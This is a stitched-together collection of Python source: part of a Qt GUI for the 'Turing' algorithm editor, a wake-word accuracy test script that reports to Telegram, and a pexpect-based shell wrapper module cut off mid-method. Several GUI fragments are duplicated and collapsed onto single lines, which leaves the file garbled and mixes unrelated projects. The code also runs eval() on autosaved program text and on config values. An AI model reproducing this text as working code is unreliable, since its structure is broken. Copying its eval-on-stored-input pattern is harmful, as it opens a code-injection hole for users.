    # Convert the BB-style tags to real HTML.
    ret = ret.replace("[b]", block_html()).replace("[/b]", "</span>")
    ret = ret.replace("[k]", keyword_html()).replace("[/k]", "</span>")
    ret = ret.replace("[c]", "<code>").replace("[/c]", "</code>")
    ret = ret.replace("[i]", "<i>").replace("[/i]", "</i>")
    ret = ret.replace("[t]", comment_html()).replace("[/t]", "</span>")
    ret = ret.replace("[g]", "<b>").replace("[/g]", "</b>")
    ret = ret.replace("[n]", "<i>" + red_html()).replace("[/n]", "</span></i>")
    ret = ret.replace("[s]", red_html()).replace("[/s]", "</span>")
    ret = util.html.unescape_brackets(ret)
    # NOTE(review): this replace appears to be a no-op as written; it looks
    # like a mangled non-breaking-space substitution (e.g. "  " -> "&nbsp; ").
    # Verify against the original file before changing it.
    ret = ret.replace(" ", " ")
    return ret.strip()
ret.replace("[g]", "<b>").replace("[/g]", "</b>") ret = ret.replace("[n]", "<i>" + red_html()).replace("[/n]", "</span></i>") ret = ret.replace("[s]", red_html()).replace("[/s]", "</span>") ret = util.html.unescape_brackets(ret) ret = ret.replace(" ", " ") return ret.strip() def store_line(item: QTreeWidgetItem, stmt: BaseStmt): GuiState.item_map[id(stmt)] = item, stmt def add_block(block: BlockStmt, current, add=False): current.append(0) for child in block.children: add_line(current, child, add=add) if isinstance(child, BlockStmt): add_block(child, current, add) current[-1] += 1 current.pop() def load_block(stmt: BlockStmt): GuiState.item_map = {} GuiState.ui.treeWidget.clear() AppState.algo = stmt GuiState.root_item, lbl = get_item_html(str_stmt(AppState.algo)) GuiState.ui.treeWidget.addTopLevelItem(GuiState.root_item) store_line(GuiState.root_item, AppState.algo) GuiState.ui.treeWidget.setItemWidget(GuiState.root_item, 0, lbl) current = [] add_block(stmt, current) GuiState.ui.treeWidget.expandAll() def load_pseudocode(algo): code = eval(algo) load_block(code) def load_algo(): load_block(BlockStmt([ ForStmt("i", parse("1"), parse("16"), [ IfStmt(parse("i % 15 == 0"), [ DisplayStmt(parse("\"FizzBuzz\"")) ]), ElseStmt([ IfStmt(parse("i % 3 == 0"), [ DisplayStmt(parse("\"Fizz\"")) ]), ElseStmt([ IfStmt(parse("i % 5 == 0"), [ DisplayStmt(parse("\"Buzz\"")) ]), ElseStmt([ DisplayStmt(parse("i")) ]) ]) ]), ]) ])) def algo_double_click(): if GuiState.ui.btnAlgo_Edit.isEnabled(): btn_edit_line() def algo_sel_changed(): current = get_current_pos() current_stmt = get_current_stmt() is_item = current_stmt is not None is_root = current == [] is_changeable = is_item and not is_root is_editable = is_changeable \ and not isinstance(current_stmt, (BreakStmt, ContinueStmt, ElseStmt)) \ and type(current_stmt) not in [BaseStmt, BlockStmt] GuiState.ui.btnAlgo_Delete.setEnabled(is_changeable) GuiState.ui.btnAlgo_Edit.setEnabled(is_editable) 
GuiState.ui.btnAlgo_Dupl.setEnabled(is_changeable and not isinstance(current_stmt, ElseStmt)) can_up = is_changeable and current != [0] GuiState.ui.btnAlgo_UpBlock.setEnabled(can_up) GuiState.ui.btnAlgo_Up.setEnabled(can_up) can_down = is_changeable and current != [len(AppState.algo.children) - 1] GuiState.ui.btnAlgo_Down.setEnabled(can_down) GuiState.ui.btnAlgo_DownBlock.setEnabled(can_down) GuiState.ui.btnAlgo_Variable.setEnabled(is_item) GuiState.ui.btnAlgo_Display.setEnabled(is_item) GuiState.ui.btnAlgo_Input.setEnabled(is_item) GuiState.ui.btnAlgo_Call.setEnabled(is_item) GuiState.ui.btnAlgo_Func.setEnabled(is_item) GuiState.ui.btnAlgo_Return.setEnabled(is_changeable) GuiState.ui.btnAlgo_Stop.setEnabled(is_item) GuiState.ui.btnAlgo_Sleep.setEnabled(is_item) GuiState.ui.btnAlgo_If.setEnabled(is_item) GuiState.ui.btnAlgo_Else.setEnabled(is_changeable) GuiState.ui.btnAlgo_For.setEnabled(is_item) GuiState.ui.btnAlgo_While.setEnabled(is_item) GuiState.ui.btnAlgo_Continue.setEnabled(is_changeable) GuiState.ui.btnAlgo_Break.setEnabled(is_changeable) GuiState.ui.btnAlgo_Comment.setEnabled(is_item) GuiState.ui.btnAlgo_GClear.setEnabled(is_item) GuiState.ui.btnAlgo_GWindow.setEnabled(is_item) GuiState.ui.btnAlgo_GPoint.setEnabled(is_item) GuiState.ui.btnAlgo_GLine.setEnabled(is_item) GuiState.ui.btnAlgo_GFunc.setEnabled(is_item) if is_changeable: parent_stack = [AppState.algo] for p in current: parent_stack.append(parent_stack[-1].children[p]) existing_else = current[-1] + 1 < len(parent_stack[-2].children) and isinstance( parent_stack[-2].children[current[-1] + 1], ElseStmt) GuiState.ui.btnAlgo_Else.setEnabled(isinstance(current_stmt, IfStmt) and not existing_else) in_loop = any(x for x in parent_stack if type(x) in [ForStmt, WhileStmt]) GuiState.ui.btnAlgo_Continue.setEnabled(in_loop) GuiState.ui.btnAlgo_Break.setEnabled(in_loop) in_func = any(x for x in parent_stack if type(x) == FuncStmt) GuiState.ui.btnAlgo_Return.setEnabled(in_func) def algo_scroll(event: 
def fix_qt_shitty_margins():
    """Work around Qt icon-button spacing: pad the text and enforce a min height."""
    for wgt in GuiState.window.centralWidget().findChildren(QPushButton):
        if not wgt.icon().isNull() and wgt.text() and not wgt.text().startswith(" "):
            wgt.setText(" " + wgt.text())
            wgt.setMinimumHeight(28)


def init_theme_actions():
    """Populate the theme menu with one checkable action per known theme."""
    def gen(s):
        # Bind the theme name early; a plain lambda would late-bind the loop var.
        return lambda: set_theme(s)

    for theme in theming.themes:
        action = QAction(GuiState.window)
        action.setStatusTip(theme)
        action.setCheckable(True)
        action.triggered.connect(gen(theme))
        GuiState.ui.menuChangeTheme.addAction(action)
        if theme == "custom":
            # The "custom" entry is only shown when a custom theme is defined.
            action.setVisible(bool(theming.themes["custom"][1]))


def load_home_actions():
    """Mirror the New/Open menu actions as big flat buttons on the home panel."""
    def gen(btn, a):
        # Keep the button's enabled state and caption in sync with the action.
        def func():
            btn.setEnabled(a.isEnabled())
            btn.setText(a.text())

        return func

    for a in [GuiState.ui.actionNew, GuiState.ui.actionOpen]:
        btn = QFlatButton(GuiState.window)
        btn.setIcon(a.icon())
        btn.clicked.connect(a.triggered)
        a.changed.connect(gen(btn, a))
        GuiState.ui.verticalLayout_3.addWidget(btn)


def init_ui():
    """Build the main window: load the UI, all sub-panels, handlers and settings.

    Order matters here: widgets must exist before handlers are connected and
    before persisted settings are applied.
    """
    from forms.ui_mainwindow import Ui_MainWindow
    GuiState.window = MainWindowWrapper()
    GuiState.ui = Ui_MainWindow()
    translator.add(GuiState.ui, GuiState.window)
    GuiState.ui.setupUi(GuiState.window)
    load_languages()
    GuiState.ui.treeWidget.header().setSectionResizeMode(QHeaderView.ResizeToContents)
    GuiState.algo_base_font = GuiState.ui.treeWidget.font()
    recent_init_actions()
    article_thr = article_init_actions(util.settings.value("load_articles", False, type=bool))
    if article_thr is None:
        article_init_button()
    load_home_actions()
    load_code_editor()
    load_plot_canvas()
    load_algo()
    init_action_handlers()
    if sys.platform not in ["darwin", "linux"]:
        # On other platforms, move the language menu to the menubar's corner.
        right_corner = QMenuBar()
        GuiState.ui.menubar.removeAction(GuiState.ui.menuLanguage.menuAction())
        right_corner.addAction(GuiState.ui.menuLanguage.menuAction())
        GuiState.ui.menubar.setCornerWidget(right_corner)
    init_event_handlers()
    init_theme_actions()
    algo_sel_changed()
    GuiState.filters = {
        "all": translate("MainWindow", "Program file (*.py *.tr *.alg)"),
        "py": translate("MainWindow", "Python file (*.py)"),
        "tr": translate("MainWindow", "Turing program (*.tr)"),
        "alg": translate("MainWindow", "Algobox file (*.alg)")
    }
    autosave_init()
    set_show_toolbar(util.settings.value("show_toolbar", True, type=bool))
    set_show_toolbar_text(util.settings.value("show_toolbar_text", True, type=bool))
    GuiState.ui.actionUseArrowNotation.setChecked(util.settings.value("use_arrow_notation", False, type=bool))
    # Detect Debian/Ubuntu to default the update checker off (distro packages
    # handle updates themselves).
    is_deb = False
    if os.path.exists("/etc/issue"):
        try:
            with open("/etc/issue", encoding="utf-8") as fp:
                issue = fp.read()
            # NOTE(review): re.match only matches at the start of the string,
            # even with re.M; re.search may have been intended. TODO confirm.
            if re.match("Debian", issue, re.M) or re.match("Ubuntu", issue, re.M):
                is_deb = True
        except:
            pass
    GuiState.ui.actionLoadRecentArticles.setChecked(util.settings.value("load_articles", False, type=bool))
    GuiState.ui.actionCheckForUpdates.setChecked(util.settings.value("check_for_updates", not is_deb, type=bool))
    center_widget(GuiState.window, None)
    fix_qt_shitty_margins()
    if util.settings.value("load_articles", False, type=bool):
        article_update_text_end(article_thr)
    GuiState.window.show()


def init_event_handlers():
    """Connect every button, tree and tab signal to its handler function."""
    GuiState.ui.btnSendInput.clicked.connect(send_user_input)
    GuiState.ui.btnClearOutput.clicked.connect(clear_output)
    GuiState.ui.btnPrintOutput.clicked.connect(print_output)
    GuiState.ui.btnSaveOutput.clicked.connect(save_output)
    GuiState.ui.btnAlgo_Delete.clicked.connect(btn_delete_line)
    GuiState.ui.btnAlgo_Edit.clicked.connect(btn_edit_line)
    GuiState.ui.btnAlgo_UpBlock.clicked.connect(btn_move_up_block)
    GuiState.ui.btnAlgo_Up.clicked.connect(btn_move_up)
    GuiState.ui.btnAlgo_Down.clicked.connect(btn_move_down)
    GuiState.ui.btnAlgo_DownBlock.clicked.connect(btn_move_down_block)
    GuiState.ui.btnAlgo_Dupl.clicked.connect(btn_dupl_line)
    GuiState.ui.btnAlgo_Variable.clicked.connect(add_def_variable)
    GuiState.ui.btnAlgo_Display.clicked.connect(add_display)
    GuiState.ui.btnAlgo_Input.clicked.connect(add_input)
    GuiState.ui.btnAlgo_Call.clicked.connect(add_call)
    GuiState.ui.btnAlgo_Func.clicked.connect(add_def_func)
    GuiState.ui.btnAlgo_Return.clicked.connect(add_return)
    GuiState.ui.btnAlgo_Stop.clicked.connect(add_stop_stmt)
    GuiState.ui.btnAlgo_Sleep.clicked.connect(add_sleep_stmt)
    GuiState.ui.btnAlgo_If.clicked.connect(add_if_block)
    GuiState.ui.btnAlgo_Else.clicked.connect(add_else_block)
    GuiState.ui.btnAlgo_For.clicked.connect(add_for_loop)
    GuiState.ui.btnAlgo_While.clicked.connect(add_while_loop)
    GuiState.ui.btnAlgo_Continue.clicked.connect(add_continue_stmt)
    GuiState.ui.btnAlgo_Break.clicked.connect(add_break_stmt)
    GuiState.ui.btnAlgo_Comment.clicked.connect(add_comment_stmt)
    GuiState.ui.btnAlgo_GClear.clicked.connect(add_gclear)
    GuiState.ui.btnAlgo_GWindow.clicked.connect(add_gwindow)
    GuiState.ui.btnAlgo_GPoint.clicked.connect(add_gpoint)
    GuiState.ui.btnAlgo_GLine.clicked.connect(add_gline)
    GuiState.ui.btnAlgo_GFunc.clicked.connect(add_gfunc)
    GuiState.ui.treeWidget.itemSelectionChanged.connect(algo_sel_changed)
    GuiState.ui.treeWidget.itemDoubleClicked.connect(algo_double_click)
    # Swap in the custom wheel handler, keeping the original for fallback.
    GuiState.ui.treeWidget.wheelEventOrig = GuiState.ui.treeWidget.wheelEvent
    GuiState.ui.treeWidget.wheelEvent = algo_scroll
    GuiState.ui.tabWidget.currentChanged.connect(change_tab)
GuiState.ui.btnAlgo_Display.clicked.connect(add_display) GuiState.ui.btnAlgo_Input.clicked.connect(add_input) GuiState.ui.btnAlgo_Call.clicked.connect(add_call) GuiState.ui.btnAlgo_Func.clicked.connect(add_def_func) GuiState.ui.btnAlgo_Return.clicked.connect(add_return) GuiState.ui.btnAlgo_Stop.clicked.connect(add_stop_stmt) GuiState.ui.btnAlgo_Sleep.clicked.connect(add_sleep_stmt) GuiState.ui.btnAlgo_If.clicked.connect(add_if_block) GuiState.ui.btnAlgo_Else.clicked.connect(add_else_block) GuiState.ui.btnAlgo_For.clicked.connect(add_for_loop) GuiState.ui.btnAlgo_While.clicked.connect(add_while_loop) GuiState.ui.btnAlgo_Continue.clicked.connect(add_continue_stmt) GuiState.ui.btnAlgo_Break.clicked.connect(add_break_stmt) GuiState.ui.btnAlgo_Comment.clicked.connect(add_comment_stmt) GuiState.ui.btnAlgo_GClear.clicked.connect(add_gclear) GuiState.ui.btnAlgo_GWindow.clicked.connect(add_gwindow) GuiState.ui.btnAlgo_GPoint.clicked.connect(add_gpoint) GuiState.ui.btnAlgo_GLine.clicked.connect(add_gline) GuiState.ui.btnAlgo_GFunc.clicked.connect(add_gfunc) GuiState.ui.treeWidget.itemSelectionChanged.connect(algo_sel_changed) GuiState.ui.treeWidget.itemDoubleClicked.connect(algo_double_click) GuiState.ui.treeWidget.wheelEventOrig = GuiState.ui.treeWidget.wheelEvent GuiState.ui.treeWidget.wheelEvent = algo_scroll GuiState.ui.tabWidget.currentChanged.connect(change_tab) def autosave_write(): util.settings.setValue("autosave_type", AppState.mode_python) util.settings.setValue("autosave_date", datetime.datetime.now()) if AppState.mode_python: content = GuiState.code_editor.toPlainText() else: content = repr(AppState.algo) util.settings.setValue("autosave_content", content) def autosave_tick(): if AppState.app_started: if is_modified(): util.settings.setValue("autosave_dirty", True) autosave_write() else: util.settings.setValue("autosave_dirty", False) autosave_clear() def autosave_init(): AppState.autosave_timer = QTimer() AppState.autosave_timer.timeout.connect(autosave_tick) 
AppState.autosave_timer.start(1000) def autosave_load(): AppState.mode_python = util.settings.value("autosave_type", False, type=bool) content = util.settings.value("autosave_content", "") if AppState.mode_python: GuiState.code_editor.setPlainText(content, "", "") else: load_pseudocode(content) refresh() def autosave_clear(): util.settings.setValue("autosave_dirty", False) util.settings.remove("autosave_content") util.settings.remove("autosave_date") util.settings.remove("autosave_type") def clean_exit(): autosave_clear() GuiState.code_editor.backend.stop() pf_end() sys.exit() def handler_SendFeedback(): QDesktopServices.openUrl(QUrl("https://goo.gl/forms/GVCJoBTQv0jYp3MA3")) def version_check(): import json import urllib.request import re result = json.load(urllib.request.urlopen( urllib.request.Request("https://api.github.com/repos/TuringApp/Turing/releases/latest", headers={'User-Agent': 'Mozilla/5.0'}))) if result and type(result) == dict and "tag_name" in result: version = re.findall(r"[\d.]+", result["tag_name"])[0] current = re.findall(r"[\d.]+", util.__version__)[0] from distutils.version import StrictVersion if StrictVersion(version) > StrictVersion(current): AppState.new_version = True def run_updater(): AppState.new_version = False thr = threading.Thread(target=version_check, args=()) thr.start() while thr.is_alive(): QCoreApplication.processEvents() if AppState.new_version: msg = msg_box(translate("MainWindow", "A new version of Turing is available.\nWould you like to download it?"), parent=GuiState.window) if msg.exec_() == QMessageBox.Yes: QDesktopServices.openUrl(QUrl("https://github.com/TuringApp/Turing/releases/latest")) def autosave_check(): dirty = util.settings.value("autosave_dirty", False, type=bool) if dirty: msg = msg_box( translate("MainWindow", "A modified file has been automatically saved.\nWould you like to recover it?"), parent=GuiState.window) if msg.exec_() == QMessageBox.Yes: autosave_load() else: autosave_clear() def init_pre(): if 
not hasattr(sys, "frozen"): async_import("editor_backend") init_pre() def init_main(splash): init_ui() set_theme(util.settings.value("app_theme", "default")) change_language(QLocale.system().name()) GuiState.window.show() splash.finish(GuiState.window) if GuiState.ui.actionCheckForUpdates.isChecked(): run_updater() GuiState.window.raise_() GuiState.window.activateWindow() autosave_check() AppState.app_started = True
test_ww.py
"""Wake-word ("ww") accuracy test harness.

Plays a pre-recorded wake-word phrase at a car radio / voice assistant,
detects via microphone level edges whether the device reacted (music pausing
and resuming), repeats n_tests times, and writes a tab-separated report.
Optionally streams progress to a Telegram bot.

Requires real audio hardware (libs.recorder / libs.play) — not unit-testable.
"""
import logging
import time
from threading import Thread

import requests
from scipy.io.wavfile import read

from libs.dsp import get_rms, add_gain
from libs.play import play_data
from libs.recorder import Recorder
from libs.testloop import lombard
from telebot.credentials import bot_token
from telebot.telegram_logbot import Telebot


class MyRec(Recorder):
    """Recorder specialized for wake-word testing.

    State flags steer the edge/timeout callbacks, which abort an in-progress
    record() by raising KeyboardInterrupt (the Recorder's stop mechanism,
    presumably — confirm against libs.recorder).
    """

    def __init__(self):
        super(MyRec, self).__init__()
        self.activated = False           # wake-word was recognized (mic level dropped)
        self.waiting_for_mic = False     # stop recording on a negative level edge
        self.waiting_for_cancel = False  # stop recording on a positive level edge
        self.waiting_for_music = False   # a timeout means music did not resume
        self.timeout = 1                 # seconds below threshold before on_timeout fires

    def calculate_tresholds(self):
        """Interactively measure RMS noise with the radio on and off.

        Returns (noise_on, noise_off) in dBFS; printed values add the
        dBFS->dBSPL correction loaded from settings.
        """
        input("Turn on radio and press ENTER")
        self.record(5, channel=1, monitor=True)
        noise_on = get_rms(self.data)[1]
        print("RMS: %sdBSPL\n" % (noise_on + self.correction[0]))
        input("Turn off radio and press ENTER")
        self.record(5, channel=1, monitor=True)
        noise_off = get_rms(self.data)[1]
        print("RMS: %sdBSPL\n" % (noise_off + self.correction[0]))
        print("\nLombard effect: %0.2fdB" % (lombard(noise_on)))
        return noise_on, noise_off

    def on_timeout(self):
        """Level stayed under threshold too long: if we expected music to
        resume, fall back to retrying the cancel command."""
        print("TIMEOUT")
        if self.waiting_for_music:
            self.waiting_for_cancel = True
            print("TIMEOUT: trying again with cancel command")
            raise KeyboardInterrupt

    def on_negative_edge(self):
        """Level dropped (music paused): the wake-word was recognized."""
        print("Negative edge")
        if self.waiting_for_mic:
            print("MIC ACTIVATED")
            self.activated = True
            self.waiting_for_mic = False
            self.waiting_for_cancel = True
            raise KeyboardInterrupt
        else:
            pass

    def on_positive_edge(self):
        """Level rose (music resumed): the cancel command was understood."""
        print("Positive edge")
        if self.waiting_for_cancel:
            print("COMMAND DETECTED")
            self.activated = False
            raise KeyboardInterrupt
        else:
            pass


def load_settings():
    """Load the mic dBFS->dBSPL correction into the module-global recorder `r`.

    NOTE(review): mutates the global `r` (must already exist) and uses eval()
    on file contents — fine for a trusted local config, but unsafe on
    untrusted input.
    """
    try:
        with open("settings/settings.vcfg", "r", encoding="utf-16") as f:
            for line in f.readlines():
                if "MIC_DBFSTODBSPL" in line:
                    r.correction = eval(line.split("=")[-1])
    except FileNotFoundError:
        raise FileNotFoundError("Settings file not found!")
    return


def print_ww_report(filename):
    """Write the tab-separated test report (reads the module-global counters
    issued_ww / recognized_ww and the time_wakeup / time_response lists)."""
    with open(filename, "w", encoding="utf-16") as f:
        f.write("Issued ww:\t %s\n" % issued_ww)
        f.write("Recognized ww:\t %s\n" % recognized_ww)
        f.write("Wakeup time\tRecognition time\n")
        # time_wakeup can be longer than time_response (wake-ups whose cancel
        # never completed); only fully-completed rounds are written.
        for index in range(len(time_response)):
            f.write("%0.5f\t%0.5f\n" % (time_wakeup[index], time_response[index]))


def telegram_bot_sendtext(bot_message, chat_id):
    """Send a Markdown message through the Telegram HTTP API and return the JSON reply.

    NOTE(review): the message is concatenated into the URL without escaping;
    characters like '&' in bot_message would corrupt the query string.
    """
    send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + chat_id + '&parse_mode' \
                '=Markdown&text=' + \
                bot_message
    response = requests.get(send_text)
    return response.json()


if __name__ == "__main__":
    lang = "RUR"
    # create a thread to record all the process
    main_recorder = Recorder()
    t = Thread(target=main_recorder.record, args=(None, 0, None, None, False))
    t.start()
    time.sleep(2)
    name = input("Insert the name for the WW test:\n-->")
    t_logging = (input("Activate telegram logging? (y/n)")).lower()
    if t_logging == "y":
        telegram_logging = True
        oscar = Telebot(bot_token)
        oscar.main()
        logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
                            level=logging.INFO)
        oscar.send_message("Test started!")
    else:
        telegram_logging = False
    # Wake-word and cancel phrases for the selected language.
    ww = "phrases/harman/%s/%s_000.wav" % (lang, lang)
    cancel = "phrases/harman/%s/%s_999.wav" % (lang, lang)
    report_name = "ww_tests/" + name + ".csv"
    fs, ww_data = read(ww)
    _, cancel_data = read(cancel)
    r = MyRec()
    load_settings()
    if telegram_logging:
        oscar.send_message("Calculating treshold...")
    # Automatically calculate treshold. Just turn on the radio
    input("Turn on radio and press ENTER")
    r.record(5, channel=1, monitor=True)  # record noise with radio on
    noise_on = get_rms(r.data)[1]  # measure noise
    print("RMS: %sdBSPL\n" % (noise_on + r.correction[0]))
    play_data(ww_data, fs)  # Wakeword to stop music
    r.lowtreshold = noise_on - 3  # set default treshold value
    r.waiting_for_mic = True  # recording will stop at negative edge (to detect when music stops)
    r.record(5, channel=1, monitor=True)  # detect when the music actually stops to measure noise without radio
    # NOTE(review): hightreshold is set *below* lowtreshold here; looks
    # intentional only as a temporary bootstrap value (both are recomputed
    # from measured noise below) — confirm against libs.recorder semantics.
    r.hightreshold = r.lowtreshold - 3  # set default treshold value
    r.waiting_for_cancel = True  # now recording will stop on positive edge
    r.record(5, channel=1, monitor=True)  # record silence until positive edge
    play_data(cancel_data, fs)  # Cancel command
    r.waiting_for_music = True  # now recording will stop if timeout (noise level under treshold) longer than 1 second
    r.record(5, channel=1, monitor=True)  # ensure that the "cancel" command has been understood (if music resumes)
    noise_off = get_rms(r.data)[1]  # value of noise without radio
    # Calculate treshold values (negative and positive)
    print("RMS: %sdBSPL\n" % (noise_off + r.correction[0]))
    print("\nLombard effect: %0.2fdB" % (lombard(noise_on + r.correction[0])))
    ww_data = add_gain(ww_data, lombard(noise_on + r.correction[0]))  # adjust gain based on Lombard effect
    # Thresholds are placed halfway between each noise floor and their mean.
    mean_noise = ((noise_on + noise_off) / 2)
    r.hightreshold = (noise_on + mean_noise) / 2
    r.lowtreshold = (noise_off + mean_noise) / 2
    txt = "High treshold = %sdB\nLow treshold = %sdB" % (r.hightreshold, r.lowtreshold)
    print(txt)
    time.sleep(2)
    if telegram_logging:
        try:
            oscar.send_message("Done! \n" + txt)
        except Exception as e:
            print("Something went wrong... :(\n(%s)" % e)
    n_tests = 200
    time_wakeup = []  # array of wakeup times
    time_response = []  # array of response times
    issued_ww = 0  # number of issued wakewords
    recognized_ww = 0  # number of times the wakeword is recognized
    r.waiting_for_cancel = False
    r.waiting_for_mic = True
    try:
        for i in range(n_tests):
            if telegram_logging:
                oscar.bot_text = "Test '%s' (%s of %s)\n" % (name.replace("_", " ").upper(), (i + 1), n_tests)
                try:
                    oscar.send_message(oscar.bot_text + "...")
                except Exception as e:
                    print("Something went wrong... :(\n(%s)" % e)
            start_time = time.time()
            print("Test number %s" % (i + 1))
            cancel_repetitions = 0
            # Outer loop: replay the wake-word until it is recognized.
            while True:
                play_data(ww_data, fs)
                t1 = time.time()
                issued_ww += 1
                r.waiting_for_mic = True
                r.record(10, channel=1, monitor=True)
                if r.activated:
                    r.waiting_for_mic = False
                    wt = time.time() - t1
                    print("Time: %0.2fs" % (wt))
                    recognized_ww += 1
                    time_wakeup.append(wt)
                    print("Waiting for cancel")
                    # Inner loop: replay the cancel command until music resumes.
                    while True:
                        r.waiting_for_cancel = True
                        play_data(cancel_data, fs)
                        cancel_repetitions += 1
                        t2 = time.time()
                        r.record(20, channel=1, monitor=False)
                        rt = time.time() - t2
                        print("Time: %0.2fs" % rt)
                        # record. If timeout after response is bigger than 3 seconds, assumes the radio is not back
                        # to music
                        r.waiting_for_cancel = False
                        r.waiting_for_music = True
                        print(r.timeout)
                        print("Waiting for response from radio (threshold = %0.2fdB)" % r.lowtreshold)
                        r.record(10, channel=1, l_threshold=r.lowtreshold, monitor=True)
                        # on_timeout() re-sets waiting_for_cancel when music
                        # did not resume, which retries the cancel command.
                        if not r.waiting_for_cancel:
                            print("No timeout: music resumed")
                            time_response.append(rt)
                            r.waiting_for_music = False
                            # cancel has been correctly understood
                            print(telegram_logging)
                            if telegram_logging:
                                try:
                                    # ETA estimate from the duration of this round.
                                    deltat = time.time() - start_time
                                    ETA = deltat * (n_tests - (i + 1))
                                    print(ETA)
                                    ETA_hours = ETA / 3600
                                    ETA_minutes = (ETA % 3600) / 60
                                    ETA_seconds = ETA % 60
                                    txt = "WW_accuracy: %s of %s" % (recognized_ww, issued_ww)
                                    oscar.bot_text += txt
                                    mean_wt = sum(time_wakeup) / len(time_wakeup)
                                    mean_rt = sum(time_response) / len(time_response)
                                    print("Logging to telegram: %s" % oscar.bot_text)
                                    oscar.send_message("Done! \n"
                                                       "Rate: %s of %s\n"
                                                       "Wakeup time: %0.2fs (mean: %0.2fs)\n"
                                                       "Recognition time: %0.2fs (mean: %0.2fs)\n"
                                                       "" % (recognized_ww, issued_ww, wt, mean_wt, rt, mean_rt))
                                    print("DONE")
                                except Exception as e:
                                    print("Error! (%s)" % e)
                            # Persist the running report after every completed round.
                            print_ww_report(report_name)
                            print("Cancel\nResult: %s/%s" % (recognized_ww, issued_ww))
                            print("Proceeding to next test")
                            r.activated = False
                            break
                    break
                else:
                    print("Trying again...")
    except KeyboardInterrupt:
        print("Test interrupted")
    if telegram_logging:
        oscar.bot_text = "Test completed!"
        oscar.send_message("Test completed!")
    print("Saving report...")
    print_ww_report(report_name)
    # stopping main recording
    main_recorder.terminate()
    print(main_recorder.data)
    main_recorder.save("ww_tests/%s_FULL_RECORDING.wav" % name)
shell.py
"""Shell-process wrappers.

Two families over one abstract interface:
  * ExpectShell      - pexpect-backed, supports interaction/expect/prompts
  * SPShell          - subprocess.Popen-backed, batch-style
plus SSH helpers and a hand-rolled non-blocking stdin reader (input_while)
used by ExpectShell.fake_interact.
"""
import os
import sys
from abc import ABC, abstractmethod
from dataclasses import dataclass

import pexpect

from mlib.boot.lang import cn, is_non_str_itr, isinstsafe, islist, isstr
from mlib.boot.mlog import err, info, log, LogLevel, warn
from mlib.boot.stream import arr, isempty, listmap
from mlib.str import utf_decode
from mlib.term import log_invokation

GIT = '/usr/local/bin/git'


class AbstractShell(ABC):
    """Common interface over a spawned child process.

    Subclasses provide _start() returning the underlying process object,
    which is stored as self.p.
    """

    @staticmethod
    def com_arg(a):
        # Accept path-like objects as well as anything str()-able.
        if isinstsafe(a, os.PathLike):
            return a.__fspath__()
        else:
            return str(a)

    @staticmethod
    def command_list(*args):
        """Normalize the many accepted call shapes into a list of str args:
        nothing, multiple args, a single iterable, or a single space-separated
        string (note: naive split — quoted arguments are NOT supported)."""
        if len(args) == 0:
            return ['']
        elif len(args) > 1:
            return list(map(AbstractShell.com_arg, args))
        elif is_non_str_itr(args[0]):
            return list(map(AbstractShell.com_arg, args[0]))
        elif isstr(args[0]):
            return listmap(AbstractShell.com_arg, args[0].split(' '))
        else:
            return [AbstractShell.com_arg(args[0])]

    @staticmethod
    def command_str(*args):
        return ' '.join(AbstractShell.command_list(*args))

    def __init__(
            self,
            *command,
            silent=False
    ):
        self.command_as_str = AbstractShell.command_str(*command)
        self.command_as_list = AbstractShell.command_list(*command)
        if not silent:
            info(f'$: {self.command_as_str}')
        # The process is spawned immediately on construction.
        self.p = self._start()

    def __str__(self):
        return f'{cn(self)}{self.command_as_list}'

    @abstractmethod
    def _start(self):
        # NOTE(review, original comment garbled): return type annotation was
        # removed so the pexpect import could stay inside the method
        # -> Union[pexpect.spawn, Popen]
        pass

    @abstractmethod
    def wait(self): pass

    @abstractmethod
    def all_output(self): pass

    @abstractmethod
    def readlines(self): pass

    @abstractmethod
    def readline(self): pass

    @abstractmethod
    def readline_nonblocking(self, timeout=-1): pass

    @abstractmethod
    def interact(self): pass

    @abstractmethod
    def expect(self, *args): pass

    @abstractmethod
    def sendline(self, s): pass

    def bash(self, s):
        """Wrap s in a /bin/bash -c invocation and send it as a line."""
        return self.sendline(f'/bin/bash -c """{AbstractShell.command_str(s)}"""')

    @abstractmethod
    def alive(self): pass

    @abstractmethod
    def close(self): pass


def mypid():
    """PID of the current (parent) process."""
    return os.getpid()


class ExpectShell(AbstractShell):
    """pexpect.spawn-backed shell with expect/prompt/interaction support."""

    def __init__(
            self,
            *command,
            silent=False,
            timeout=None,
            logfile_read=None,
            cwd=None,
            env=None,
            verbose=False
    ):
        from mlib.file import File
        self.cwd = File(cwd).abspath if cwd is not None else None
        self.env = env
        super().__init__(*command, silent=silent)
        self.p.timeout = timeout
        self.p.logfile_read = logfile_read
        self._logging_to_stdout = False
        if verbose:
            # verbose implies log_to_stdout, which owns logfile_read itself.
            if logfile_read is not None:
                err('set logfile read and verbose?')
            else:
                self.log_to_stdout()

    def _start(self):
        import pexpect
        return pexpect.spawn(self.command_as_list[0], self.command_as_list[1:],
                             timeout=None, cwd=self.cwd, env=self.env)

    def wait(self):
        return self.p.wait()

    def all_output(self):
        return '\n'.join(listmap(utf_decode, self.readlines()))

    def exit_status(self):
        # Output must be drained before pexpect reports an exit status.
        justdo = self.all_output()
        return self.p.exitstatus

    def return_code(self):
        return self.exit_status()

    def readlines(self):
        return self.p.readlines()

    def readline(self):
        return self.p.readline()

    def readline_nonblocking(self, timeout=-1):  # in seconds
        """Read one line char-by-char; returns None if no full line arrives
        within timeout. Undecodable bytes are replaced by the error text."""
        line = ''
        while True:
            try:
                try:
                    c = utf_decode(self.p.read_nonblocking(size=1, timeout=timeout))
                except UnicodeDecodeError as e:
                    c = str(e)
                if c == '\n':
                    return line
                else:
                    line += c
            except pexpect.TIMEOUT:
                return None

    def readlines_nonblocking(self, timeout=0.1):
        # Infinite generator of lines (None on each timeout).
        while True:
            yield self.readline_nonblocking(timeout=timeout)

    def pipe_and_close_on(self, expect_s, close_fun=None):
        """Log child output until a line containing expect_s appears, then
        run close_fun (if any) and close the process."""
        for s in self.readlines_nonblocking():
            if s is not None:
                log(s)
            if s is not None and expect_s in s:
                log(f'done! ({self} got {expect_s})')
                if close_fun is not None:
                    close_fun(self)
                self.close()
                log('closed p')
                break

    @log_invokation(level=LogLevel.INFO)
    # BUG(review): d_kwargs={} is a mutable default argument (shared between
    # calls); should be None with a fallback inside.
    def fake_interact(self, driver=None, driver_args=(), fun=None, d_kwargs={}):
        """Pseudo-interactive session for non-tty contexts: a driver thread
        consumes output while input_while() polls local stdin for lines to send."""
